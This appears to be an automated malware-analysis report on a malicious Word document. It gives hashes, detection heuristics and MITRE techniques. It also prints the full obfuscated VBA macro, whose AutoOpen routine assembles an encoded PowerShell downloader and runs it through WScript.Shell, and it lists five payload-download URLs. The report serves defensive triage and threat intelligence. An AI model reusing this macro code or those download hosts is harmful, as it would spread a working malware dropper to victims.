Office (OLE) malware analysis — malicious · fa467100c8cbbc08

MALICIOUS

Office (OLE)

236.5 KB Created: 2018-07-04 12:32:00 Authoring application: Microsoft Office Word First seen: 2018-07-18

MD5: d41c7dcf76d22c39143557300ff3cebe SHA-1: b39b8b1b7f3334a26389fe3a0fd7af11e6541c9a SHA-256: fa467100c8cbbc088239e5f5fa1b4050a3d0aa5117892c37221f19bb5fdbbdad

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes WScript.Shell and a Shell() call, indicating an attempt to execute commands, likely to download and run a second-stage payload. The reconstructed command string 'wershell' suggests the execution of PowerShell.

Heuristics 10

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

   SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
   qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

   SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
   qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)

Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL

A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Name = "msbilcAZjT"
Sub AutoOpen()
On Error Resume Next

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wildpete.com/73v5/ Referenced by macro
- http://www.escoladeemagrecimento.com.br/jl/Referenced by macro
- http://www.southgatetowerquan7.com.vn/aokE/Referenced by macro
- http://www.salinzada.com/4A3bU8Pb/Referenced by macro
- http://www.tomsbigworld.com/VKT9j/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13594 bytes
SHA-256: `35785d4fb878d2e9da86f724cc3de35b0179316c6a7022ce6716fff3c483562a`
Detection ClamAV: No threats found Obfuscation or payload: likely 325 of 610 identifiers look randomly generated (e.g. 'drTTsRzRjjC') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "bGQHJKU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "msbilcAZjT" Sub AutoOpen() On Error Resume Next zCqEo = 40375 + lBOCU * kpcJi / iCFiCA / KQRqb / qDdMD JLAZQ = 82535 + PWumn * TUMpq / NzNzCN / NXjaSu / iuLJWD rXlLI = 1342 + rGJqAA * rTJrY / DXKwUK / viJHdZ / rHtqwd ZfHOU = 80265 + SWvDz * PLvOwM / cpjwbr / jYICTm / oSGihX vAoWS = 92992 + TzzLJO * jwKndz / uOskNT / tojQpY / prZIvM XaslMP = 65353 + CvnCRI * Otwqif / MLPVo / jivMRw / wSjiDH YKrJY = 78259 + TwuEZ * BmwmFd / ZKRuT / IuHkii / JVDAao sLzbQc = 35544 + KEjFw * OhVqb / AUzal / bsvMN / bDRAOn lGcTDksjQ (Qtdlrz + GPMUXw) MOZYr = 55435 + zTklK * cGcYMW / zAZLzq / ivwOSh / OnbvHz UoJUCa = 52391 + dDwNVG * rPlls / PvBZR / SjiSWN / hrYjTv TIIKB = 41923 + Uatnr * ILoNaB / hEWWSd / NTBcE / RdsRA tdKUoG = 96994 + ZNGjH * FsIul / IDwkcz / ZbTfRq / fllhl End Sub Function Qtdlrz() On Error Resume Next jnKJLW = 82677 - LEunCu * 55250 + LYlAq - (pOVwQN / fQYNDl - kNfGaC - lkSizj - (awTSn - 77916 - voNFdD + 61301)) bsftb = (KZsRmd + iVjuXr - 55600 / lzpiG * 64822 - LOmWET) WZwIkQ = sianIE / 58476 / TRiQE - EuPzu + 77526 * SBwzG * Otjqwz * FpsAfs + (ltnzm + WRiiLp) YZddoC = QJnaf / 38354 / MPCPRC - nZNzM + 60758 * zOzfJ * DfLOL * kBcFNT + (zKBcT + nFkAQj) cMMZqFPd = "wershe" + "ll " + " " + " " + "&" + Chr(40) + " $" + "Env:" + "COMsPe" + "C[4,24" + ",25]-jOiN" + "''" + Chr(41) + Chr(40) + " -jOi" + "N " + Chr(40) + "'4f65" KAjGC = GThPn / 56177 / ifaJm - zOfAft + 97293 * iCRjKZ * GzjRa * hwYFvw + (jXHffa + wfAEN) WiTuqv = zZhDo / 7167 / RVLUAd - hPvmdl + 42096 * Sivhk * BhiOR * TYczoP + (VjZjP + hpSXI) bcQPj = DDciqr / 23279 / QSGuk - XwGvlD + 69454 * DazfE * NEfJZ * sWEoQ + (TStfZF + QfdWV) dtpABl = notLm / 94642 / SEBuR - zjRUXB + 82713 * nrkiK * vYDWCD * AiYhs + (kCLiiE + fubUcA) piCfOtR = "N81p105N" + "29u78L6" + "9L87N1" + "3L79N" + "66p74" + "S69K67" + "f84O0" SYwRk = FWvWii / 28445 / vAQNK - FQKOBw + 54115 * NdzIE * slLtP * ltnTD + (iLtqHX + MCBOiP) AzzJdc = ZtBir / 27294 / wEtmfZ - JbNCd + 39642 * AwjuCI * BhPEQ * KIKzr + (Pjqihz + oqYkGz) MlISZW = GWJpXz / 15770 / MdrLD - QbXVa + 23227 * FqXddb * zkUthV * ojAjZn + (qYWXM + vJkwz) lAjlM = WRCbIw / 57461 / mbrWmB - iPSBG + 31650 * uqzXu * kbIwo * DVHOPY + (inUSOK + mClNkF) zQQTD = "f110S6" + "9L84y" + "14u119u" + "69p66N99" + "K76L" + "73O69N7" XizoO = jPYIa / 8100 / XwFBvB - GkHpR + 58152 * GvGMQ * HiuhX * fuUmwS + (SaqlVL + IOmXJ) TXMclD = zKSth / 96781 / CbBCdM - OZXlNw + 70958 * qvOiKj * umiUmh * BZjLAj + (jKGtsE + oqXHWP) kDaTR = KmfsDY / 58378 / VMlwJ - cLaQK + 71414 * vJssX * AAcUB * BIBnh + (NrBzvd + NltYdJ) jvOdm = jAdKt / 85328 / dHPbYs - wtzvNP + 6907 * mHbwK * nGtYBj * NNqGD + (KGWSAk + MmvTQX) drTTsRzRjjC = "8O84" + "{27L4" + "u107K114" + "O87f29N7" + "K72{84N" + "84{80" + "K26y1" ENprvu = dpkoAc / 77354 / YwOYw - VBuWwB + 55443 * OAKBfR * fNFWju * tSnBS + (jVkIIq + LuUzsQ) XOWiui = qBVCXM / 46120 / fIoJVs - PobNi + 59613 * KaIii * zrIMVB * EBQcY + (dGniG + EUwhG) bjdwzW = skICPv / 5801 / bjujw - sPBtoj + 55122 * tGdSvr * ooEvA * kcGsvf + (TkEIU + jUcEI) DIrBYw = Lwmvqo / 90899 / HmvAs - ZRICV + 96406 * IoMjvH * ftahww * EjpNU + (pbhhE + jiqjz) WvaKbGd = "5L15y8" + "7K73" + "y76y68L80" + "f69p84y69" + "L14y" + "67f79N" + "77O1" ujOIi = EkjGFU / 49619 / pWLzwS - LfNYJj + 88393 * aYtsr * zDjwR * kktNf + (aaorcB + QjABk) wEDJa = ujzjO / 23407 / EwkUl - oAYFj + 13978 * fjXToJ * izrPuG * SobJNV + (zSzJF + KDZwX) IKTIi = bhTrS / 60693 / fJBam - sZITc + 67591 * rnbbwC * aJwRcK * DCGiW + (bWuPJ + Brwzq) ZmUoGs = PjaVLj / 95875 / wpXBkG - UUsLS + 65464 * EiKHa * XjPvO * GcBBjf + (nCBZz + kCSAv) RZcvwFmrj = "5L23f19" + "L86p2" + "1K15y96u7" + "2f84K" + "84S80" + "u26f15N15" BTszmG = wWGwNc / 55056 / qKObI - tFtGw + 64340 * WIiVPs * DXmwVV * liKlF + (HcIzB + vINzrn) ZMNivL = JuDSa / 53470 / zzuTSI - HuzCFM + 3228 * BFjTAo * tzFqjW * kkbzJ + (kHzhm + SSOcp) rcObb = kwFSXQ / 10705 / rHajUt - dtAiU + 65498 * VpYuKw * iXDioV * BKkjv + (DBnPXu + OjOwH) mcPtc = IIJjW / 924 / YMbjPu - mtUBJ + 45826 * vPzJG * ZijmRH * mmtRQP + (WpnzwB + csINkF) wWpkiwMiE = "N87y87p" + "87O14O69" + "f83y6" + "7p79u76S" + "65u68O6" + "9K69O77p6" + "5p71S82N" + "69N67K73" + "{77L69L78" + "N84N" ABRlG = MHPLkD / 92502 / tiRVT - UwVvqd + 89091 * cZbpI * fKjwiK * Ucurmc + (Nmsurm + EjVudj) NtJaQZ = pcpSI / 31635 / AACltj - GczKEs + 93504 * aYjCpZ * krAqkj * zhplz + (sFcqYv + QKPLh) iqkvuV = jzVmJJ / 99995 / aDEBM - qhjzW + 70842 * dLCFdq * mKwrGz * oXHicp + (FRpcTp + JDwYkG) mSjfT = jQHNu / 25508 / BJZOtv - XtMdJA + 2635 * GzSVtX * EaDJf * pKchG + (mziki + PitGDV) uUstmcSYU = "79y14O67f" + "79S77y14" + "{66S" + "82N15N74{" + "76N15N96" + "K72u84L84" spPsG = dttmDj / 5363 / Qbciwn - GCowcQ + 27988 * cbzCb * zvuoF * AjpwaS + (CFRqk + Mmmau) IDKKu = TDAEw / 21499 / Pnijkv - lOdcN + 77078 * ioIwXh * WAizhJ * KmufZu + (bAKVH + jtZhz) KPjQKG = bWSfiu / 84099 / saNsXK - MELlNt + 27415 * KVzLvf * Piqtr * jajwsQ + (LZiWS + DfFZt) NsHKii = MbKiBi / 36304 / cdbpUc - Slmdsh + 55130 * KFzFdF * QAOwDs * rjsAP + (BdkYLT + WXFpP) oCVbwLf = "u80K26" + "S15f15u8" + "7S87f87y1" + "4O83p79" + "{85f84f7" + "2N71{6" + "5L84p69L" + "84y79{87" + "S69S82N" + "81y85" + "u65{78p23" LvUfBr = wQfdQ / 65278 / bwiLYH - Ycbbci + 71307 * jFwojL * TWHIhT * wnDOEH + (qwHXl + SsEZJU) pAdEYp = ANbaYY / 2868 / tFksR - kjUYt + 20308 * FtvZjT * AOcTK * aoCJA + (RHcRUw + iEUIfi) kajbBi = cHEQaZ / 64095 / oXOddq - IpRuXN + 53088 * iwMUH * HbMVL * isqzMG + (EhKfqI + RqKGKi) oVRNE = JjvBIS / 21844 / QwUiR - XlXSWL + 26090 * QRGLd * uXZjHf * XlIXYz + (BrpYtH + CzwrtM) wEUqXjrocQ = "L14K67" + "f79u77p1" + "4y86f" + "78y15u" + "65L79N" + "75f101" + "L15S9" + "6S72" + "S84p84" + "K80y" + "26K15N15{" + "87N87" jVTzs = SYtrC / 37965 / wCvGW - KLXoqW + 97320 * iZOGwv * jDoSM * oljLjk + (jiDlii + HJhdd) Qdvwo = NsZkal / 95386 / zPuzO - EYbhRV + 1208 * ZasOTZ * IMajQ * ISEwH + (dDiEt + lzsBOi) bkwflD = zOzHn / 20618 / VZncKl - DAVcb + 38014 * IaVLpS * EmEac * iRiww + (hwhWE + rbYkc) Jjwoo = vwsmRm / 66370 / hYllR - iHmdb + 8382 * szrmT * CRsQt * EAzbvj + (nCkTpm + DYBzS) bMtEE = "y87p14K" + "83{65y" + "76N73O" + "78S90S" + "65O68S65f" + "14p67p79N" Qtdlrz = cMMZqFPd + piCfOtR + zQQTD + drTTsRzRjjC + WvaKbGd + RZcvwFmrj + wWpkiwMiE + uUstmcSYU + oCVbwLf + wEUqXjrocQ + bMtEE WCVuKL = UajGw / 26852 / JwMSC - vbktn + 54041 * btCbZt * wEwBBm * kDNPK + (TJBiE + jAuScG) jMCBB = zcjkp / 15506 / HMYijq - jQOHiB + 98836 * GdPuz * uszwau * SHRvLw + (FitVGV + SwuXAB) NlaXEj = bRFAK / 34387 / CKYWd - UfSsUX + 54617 * lCmTu * ZfJfI * HjBEBY + (hiqWvw + NiTiDh) qqPTj = wqWAs / 26740 / VndOrv - vivjqV + 31481 * rMbcb * RqmkUH * qIpdhE + (ZEFrH + IHujcL) End Function Function GPMUXw() On Error Resume Next wGrtCo = OhDMc / 82291 / NaCCYd - AhScG + 41783 * NOfftZ * owLaZ * FlusF + (sHUpLn + avZZRv) twKZQ = ODzqdX / 78052 / EaGCIQ - fmGjU + 60645 * JvCII * trzPN * pEcNcU + (wEhoh + vsOME) jBSXj = RWYcrc / 98521 / KOmaX - cjsYU + 85602 * wWPYt * HaDTWL * jWirw + (nEQjnz + lpAItD) QSAJDw = ruGvPO / 2260 / GwBalE - hpcZw + 87251 * auZTX * NVZnz * wJKkXl + (IiCHSR + ClKhiz) sWXrIYnYwE = "77u1" + "5p20K97{1" + "9N66p11" + "7O24{" + "112L66f" + "15N96S72" + "L84y" + "84f80K" + "26f15u15" snZfE = TlOZqd / 88545 / rlutO - NFPGQT + 11721 * jtZwj * FFYzpR * pjnOwv + (cEBfBJ + mYSPlU) ZULWw = vPkYNb / 1049 / EXFEo - kjYmG + 3547 * DcLsJA * WpwOau * tzdtrQ + (zNFcpu + qvYQu) FVAsz = BlNwD / 94968 / XWbrRX - lbstw + 43173 * ThFiD * sjNnWA * lqrEbE + (RPwaw + BTicH) bziEHO = BuoIo / 41846 / dhuko - szlDk + 59755 * quYFlj * ZuDmjp * DccHIE + (kTZtnp + bNiTc) KlOrBuODH = "K87S" + "87N8" + "7L14{84N7" + "9f77p83" + "N66S7" + "3L71O" + "87K7" + "9p82u7" + "6y68" + "N14p67p7" + "9f77{15f" tBFot = XrRPLb / 31576 / EliSJ - IucpbE + 65927 * SkULi * vzjdzz * WmpXQl + (ztnFP + PzZPMo) JGVjWI = riiHAz / 80273 / XIvbaC - bzLzq + 44284 * hYTHKR * GtkAJp * pRsoz + (DEirC + EfVYZR) KZjuA = fRECFT / 18856 / mHnSL - TOYzP + 91298 * VwaTQ * sRwGu * YGzur + (mGLdsl + BVnvAi) EjJVii = JQzpAt / 91985 / MWThPc - zsDoWO + 77859 * VvYOS * zcQIsd * NossBO + (RcTSD + mRRpL) WkkzusEGC = "118S10" + "7u116" + "p25N74{1" + "5f7O14u11" + "5O80{7" + "6S73p84y8" + "y7L96u" + "7f9K27" + "u4f87" Uazhj = bEqWwJ / 91845 / wkjRTi - HozTE + 64866 * sSGEd * twRNnw * qMsHD + (KqpGF + iLMmA) ULbtcf = wOuCYX / 99231 / jELwV - iotcF + 21303 * BjKbz * IdmuP * XPvXZ + (vDODMG + papWiR) ftSLY = sjCpB / 36064 / iVOTv - pQtXRD + 23290 * quhjK * zHEAf * cPWIVp + (kbsUs + qKzmW) IMOBl = IrBWW / 33378 / oGTat - Ccjbaz + 50495 * PTGBVh * WcONkn * wVOEb + (DKXkD + UYcko) FsDYVHzbZ = "f102O" + "100p0L" + "29{0" + "p7S22f17N" + "19S7K27{" + "4p82f9" + "9L65{" + "29{4f" + "69K7" + "8K86L" bYWhWn = nfEjq / 45237 / lSTic - YizDR + 66003 * cTHahO * zBXUUD * smSKM + (sjFwD + tQzZT) LftXv = BjOSi / 10075 / JwqdL - WWUlE + 92797 * wUMat * ZIZHSa * tCrrlf + (WuCiv + YSirt) oIwUX = CctDjv / 98308 / Ynjrh - EbnwOJ + 44585 * UNCcE * fvQYP * IkNpwJ + (tqGjFr + MNVzGN) jHjAH = vicWIb / 86306 / TOwzEK - bOdwkd + 84670 * aQRBi * djooR * PNjbi + (qszWzB + cItCD) IEijWilum = "26O84p" + "69K77" + "L80N" + "11u7S124" + "K7S1" + "1u4K87L10" + "2K100O1" + "1f7O14S" + "69K88O69" + "{7p27K70L" bFuHCZ = jELCAS / 26352 / GzBqcB - rWUiz + 62881 * zLMoKd * kuOouf * DrOhXm + (FqIMY + OYnYZM) OCLCF = ZKLqhJ / 21752 / GOOiCS - mzTDQQ + 97016 * QjikR * BDLdk * nfBRN + (OzOuPz + lcDswp) HzpMH = PWCmCh / 43095 / oiFzb - FsUEbl + 6391 * LHqOi * lDBCa * XzCEFf + (Rauhb + TDPflk) jvKvv = zzXkcD / 44050 / WGpPww - mtRaPQ + 28731 * WXQRE * bpHIR * CtpRdE + (wzZPm + luCsUf) DaCMhadbqj = "79f82N6" + "9K65" + "O67y72" + "O8O4u106" + "f82N" + "77y0N73" + "S78K0f4N" HwVWUv = nULAbv / 7606 / cRqEA - GPJbE + 27393 * bdMmY * lnGfL * dRCsBW + (UupATA + IAjMu) kjBMM = ShvQhH / 63837 / hsEAw - FSWwI + 58240 * TLZwmc * vWrcEs * cBjsIF + (ECwrY + SRJFE) jVLrw = CZSmW / 72539 / HWHEWH - ItNmc + 86759 * VNkDuk * QHFLun * WBITP + (tjBvNE + GnIZOF) hLijbB = rOBtcU / 69784 / sFTNEs - Moppuq + 56068 * jwoLmK * ZrNGC * zClkG + (uCGAB + tzttmH) qhzcIImjBp = "107{1" + "14N87u9O" + "91O84u82S" + "89u91L4f" + "65p81" + "O105S14u" + "100f" + "79{87y" + "78K76p79" + "S65N" + "68S102u73" EQzzWs = BTjhGd / 60618 / Mauuii - YRqXn + 86656 * lhDzu * cWWII * rEDaj + (nsTrB + Rwirh) OOVznI = bYfbzz / 81127 / MmDFn - izZvm + 53700 * LZjFGO * DdFzbI * VWiBDt + (mHphT + fRwBA) wFpth = dIibB / 80532 / mlNrR - rHTAA + 78781 * fwfwVk * NJDfwW * zaVMq + (nPWEHQ + qCfEo) nVhdl = RBpch / 64525 / vTujwn - LGQaa + 79487 * OwLiw * tijQzj * Zczmo + (OUCwV + RdthFG) jUzzuwGP = "u76u69p8" + "K4{106L82" + "K77{12N0f" + "4K82S99y" + "65y9{" + "27N115f8" + "4N65L" + "82K84K1" + "3L112" + "u82u79S" + "67S69{83" cwLMU = abOJoq / 60711 / MczjE - zVqczn + 92158 * qjYim * EPwCz * sIdAkl + (bJntRk + DHIjM) wACCi = iqzMnd / 68495 / hliId - EbkMCp + 94586 * NABaJu * GWZTnF * OIPSlS + (sKZbVw + PqAoB) tIkikK = aTwfu / 73068 / mprpr - zUIDn + 14627 * PBwHNp * DjXvQ * hPHMHw + (dkNQTr + iYzhud) oYWpR = UDDRv / 48141 / hiNvv - cQiojn + 42143 * iijqAn * sqlXp * KZhvUu + (RzLElF + zKkqB) mtwFZ = "y83f0K4p8" + "2u99u65S2" + "7O66L8" + "2L69O65u" + "75p27N9" + "3O67O65" + "y84u" + "67L72L91{" zzvFn = BLPuri / 46520 / kbzbkz - lEDVN + 31929 * tsTvZ * aJYXTC * UunQiU + (XZqdUp + OurjaQ) NmYTbu = GoscXF / 91679 / rwsLt - aiTfEv + 74308 * iFuWt * XAOUZI * dHjjf + (iHNsi + AnEFo) SXbwIa = bCZHi / 39534 / rRnqt - qTBqa + 70617 * LOhotl * BWLUWt * wXQVmU + (XdDshs + wVlVXb) MUlNw = DUFTUz / 84309 / wlUoQG - livMtt + 4886 * ZwwSj * CfIprq * XkYhA + (CkRhH + LbqqA) VpjAmSd = "93N93'" + ".SpLIt" + Chr(40) + "'S" + "NKOLp" + "fyu{'" + Chr(41) + "\|" + " % {" + " [ChaR" + "] " + Chr(40) + " " + "$_ -Bxo" + "r " + Chr(34) + "0x" + "20" + Chr(34) + Chr(41) + "} " + Chr(41) + Chr(41) GPMUXw = sWXrIYnYwE + KlOrBuODH + WkkzusEGC + FsDYVHzbZ + IEijWilum + DaCMhadbqj + qhzcIImjBp + jUzzuwGP + mtwFZ + VpjAmSd fkqzh = ENSaC / 42566 / UfDtrk - hHruv + 29867 * laLof * JWPww * OBWQfY + (RzqGCJ + WYXtw) kATjV = hLItF / 22898 / ZPlNtW - soAQHQ + 81767 * UJMpHl * pjrOC * ovIfF + (iFaNwT + KvADY) RuTmG = WCVwPF / 92421 / WBKrM - EwWuT + 18157 * MzlwWB * JTijJu * ovAbB + (twUNj + awTYYS) FJFkzt = CGCSb / 64275 / UQCVT - DlQcY + 34343 * bvpvJR * oriLB * zDntBl + (PFiRDE + tUtdMh) End Function Attribute VB_Name = "kMGQLqGH" Function lGcTDksjQ(cqXUlPIviPO) On Error Resume Next CCrFDm = (NulNh - PwwCms + pkPLd * hwIMkA) PoiEip = (ZroQZi - ippFr + GbJbG * zhYmti) cDqjmT = (GMpwtL - AiWAAQ + rofGz * rzAEvh) ifwqR = (OOuzCR - BXuww + DOnRm * cOEDEh) UtFXL = (AwXGTA - YoCjmY + GPLuw * phXQJ) MUMjw = (kpiEu - NuEnKD + OSzwv * LKphJ) pPBED = (nwqNcY - siZmX + uAvTjP * RWmzu) SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb) tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734) qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX) zahUU = (PcYcu - sRScYw + JdITpT * jdjUvE) QvBlZ = (KzKbw - XMPrwV + TScoG * AUomwE) suktZ = (WafIJ - jkEiV + OFmFu * OXwaZR) End Function

Open this report in the interactive analyzer, or submit your own file for analysis.